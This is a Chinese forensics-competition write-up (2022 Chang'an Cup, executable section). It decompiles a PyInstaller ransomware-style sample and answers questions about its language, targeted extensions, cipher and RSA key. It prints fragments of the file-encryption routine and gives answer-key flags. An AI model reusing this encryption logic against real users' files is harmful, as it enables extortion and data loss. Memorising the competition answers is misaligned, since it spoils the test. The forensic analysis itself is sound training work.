2022年第四届长安杯电子取证竞赛-exe部分

exe分析

分析所有掌握的检材，找到勒索邮件中被加密的文档和对应的加/解密程序，并回答下列问题

41. 分析加密程序，编译该加密程序使用的语言是

python

42. 分析加密程序，它会加密哪些扩展名的文件？

pyinstaller逆向

python3.10.8报warning了，后面改用了python3.6.8

才发现上面python版本好像报warning了，换了python3.6.8

在解析生成的encrypt_file.exe_extracted目录中的PYZ-00.pyz_extracted目录随便找一个.pyc文件复制前12字节16进制到encrypt_file_1前面

修改后缀为.pyc

PS C:\Users\12827\Desktop> uncompyle6.exe -o C:\Users\12827\Desktop\encrypt_file.py C:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pyc
C:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pyc --
# Successfully decompiled filexxxxxxxxxx C:\Users\12827\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\Scripts> PS C:\Users\12827\Desktop> uncompyle6.exe -o C:\Users\12827\Desktop\encrypt_file.py C:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pycC:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pyc --# Successfully decompiled file

查看py文件

if '.txt' == ExtensionPath or '.jpg' == ExtensionPath or '.xls' == ExtensionPath or '.docx' == ExtensionPath:time.sleep(3)data_file = os.path.join(filepath, filename)rsakey = RSA.import_key(pubkey)cipher = Cipher_pkcs1_v1_5.new(rsakey)xor_key = os.urandom(16)xor_obj = XORCBC(xor_key)outf = open(data_file + '_encrypted', 'wb')encrypted_xor_key = cipher.encrypt(xor_key)outf.write(encrypted_xor_key)buffer_size = 4096with open(data_file, 'rb') as (f):while True:data = f.read(buffer_size)if not data:breakoutf.write(xor_obj.encrypt(data))

txt、jpg、xls、docx

43. 分析加密程序，是通过什么算法对文件进行加密的？

class XORCBC:def __init__(self, key: bytes):self.key = bytearray(key)self.cur = 0def encrypt(self, data: bytes) -> bytes:data = bytearray(data)for i in range(len(data)):tmp = data[i]data[i] ^= self.key[self.cur]self.key[self.cur] = tmpself.cur = (self.cur + 1) % len(self.key)return bytes(data)

XOR

44. 分析加密程序，其使用的非对称加密方式公钥后5位为？

pubkey = '-----BEGIN PUBLIC KEY-----\nMIIBIzANBgkqhkiG9w0BAQEFAAOCARAAMIIBCwKCAQEAx5JF4elVDBaakgGeDSxI\nCO1LyyZ6B2TgR4DNYiQoB1zAyWPDwektaCfnvNeHURBrw++HvbuNMoQNdOJNZZVo\nbHVZh+rCI4MwAh+EBFUeT8Dzja4ZlU9E7jufm69TQS0PSseIiU/4Byd2i9BvIbRn\nHLFZvi/VXphGeW0qVeHkQ3Ll6hJ2fUGhTsuGLc1XXHfiZ4RbJY/AMnjYPy9CaYzi\nSOT4PCf/O12Kuu9ZklsIAihRPl10SmM4IRnVhZYYpXedAyTcYCuUiI4c37F5GAhz\nRDFn9IQ6YQRjlLjuOX8WB6H4NbnKX/kd0GsQP3Zbogazj/z7OM0Y3rv3T8mtF6/I\nkwIEHoau+w==\n-----END PUBLIC KEY-----\n'

u+w==

45. 被加密文档中，FLAG1的值是(FLAG为8位字符串，如“FLAG9:QWERT123”)

使用同样的方法逆向decrypt_file.exe

使用密码解密

TREFWGFS

2022年第四届长安杯电子取证竞赛-exe部分相关推荐

2022第四届长安杯电子取证竞赛服务器赛时思路题解 Zodi4c
2022 长安杯服务器赛时做题思路备忘 Zodi4c VC容器密码为:2022.4th.changancup! 我赛时的做题思路和关心老师的讲解基本一致,只是没了上帝视角,本人只开了服务器,所以案件 ...
第四届长安杯电子取证大赛个人总结
第四届长安杯电子取证竞赛个人总结 P1ANT731 第四届长安杯竞赛检材VC容器SHA256计算 PS E:\2022Changancup> certutil -hashfile E:\2022 ...
2020第二届长安杯电子数据竞赛试题（二次修改版），本人亲解，尽量做到细致仔细，镜像百度网盘奉上，建议大家联系一下，弘连题目还是很好的（强烈推荐）
百度云链接链接:https://pan.baidu.com/s/1iEItwBUZx6X4_oe_ZfQlvw?pwd=ybww 提取码:ybww -来自百度网盘超级会员V2的分享如果链接失效了, ...
第二届“长安杯”电子数据竞赛试题wp
话不多说,案情
2022第四届长安杯wp
目录背景检材一 1. 检材1的SHA256值为 2. 分析检材1,搭建该服务器的技术员IP地址是多少?用该地址解压检材2 3. 检材1中,操作系统发行版本号为 4. 检材1系统中,网卡绑定的静态I ...
【“到此一游”系列】（菜鸡参加“美亚杯” 电子取证大赛感受）
到此一游 -- 美亚杯感受及经验背景比赛现场 1. 上午八点二十 2. 九点 3. 十一点我的比赛过程比赛经验我的思路是 1. 第一步 2. 第二步 3.第三步注结尾感受及经验背景 ...
盘古石杯电子取证比赛WP
"盘古石杯"电子取证比赛WP 写在前面刚刚比完了比赛,觉得自己还有很多东西没做过,现在趁着写WP的时候顺便复盘一下,望各位大佬指正. 2023年5月4日中午收到短信通知告诉我可以 ...
2019年第五届美亚杯电子取证团体赛 wp
2019年第五届美亚杯电子取证团体赛 wp 案情路由器 Win1.E01 Win3.E01 L:\Group_Competition\Hacker_Linux\Linux1 MacBookAir ...
2022第四届长安杯复盘（WP）
2022长安杯案情背景:某地警方接到受害人报案称其在某虚拟币交易网站遭遇诈骗,该网站号称使用"USTD币"购买所谓的"HT币",受害人充值后不但 " ...